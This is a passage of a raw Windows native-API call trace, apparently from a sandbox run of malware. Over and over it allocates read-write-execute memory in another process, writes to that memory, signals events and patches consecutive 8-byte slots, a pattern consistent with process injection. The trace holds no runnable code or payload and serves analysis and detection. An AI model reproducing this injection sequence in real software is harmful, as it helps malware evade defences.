NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.226] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.226] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52caa2*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52caa2*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0241.226] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.226] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.226] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.226] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.227] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.227] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.227] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.227] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.227] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.227] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.227] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.227] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.228] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a078, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.228] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.228] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c7d4*, NumberOfBytesToWrite=0x18, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c7d4*, NumberOfBytesWritten=0x28df88*=0x18) returned 0x0 [0241.228] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.228] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.228] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.229] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.229] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.229] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.229] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.229] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.229] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.229] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.230] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20028, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.230] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.230] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a080, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.230] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.230] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c7be*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c7be*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0241.230] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.230] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.231] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.231] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.231] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.231] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.231] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.231] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.232] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.232] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.232] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.232] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.232] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a088, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.232] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2b, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.232] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c7a8*, NumberOfBytesToWrite=0x13, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c7a8*, NumberOfBytesWritten=0x28df88*=0x13) returned 0x0 [0241.233] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.233] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.233] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.233] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.233] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.233] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.233] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.234] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.234] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.234] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.234] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.234] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.234] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a090, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.234] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.235] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c798*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c798*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.235] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.235] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.235] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.235] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.235] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.236] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.236] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.236] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.236] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.236] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.236] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.236] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.237] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a098, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.237] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.237] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c77e*, NumberOfBytesToWrite=0x18, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c77e*, NumberOfBytesWritten=0x28df88*=0x18) returned 0x0 [0241.237] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.237] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.237] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.238] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.238] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.238] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.238] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.238] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.238] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.238] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.239] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20028, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.239] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.239] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.239] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.239] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52caca*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52caca*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0241.239] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.239] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.240] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.240] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.240] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.240] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.240] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.240] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.240] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.241] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.241] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.241] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.241] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a0a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.241] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.241] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52cad6*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52cad6*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0241.241] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.242] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.242] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.242] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.242] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.242] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.242] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.243] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.243] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.243] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.243] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: 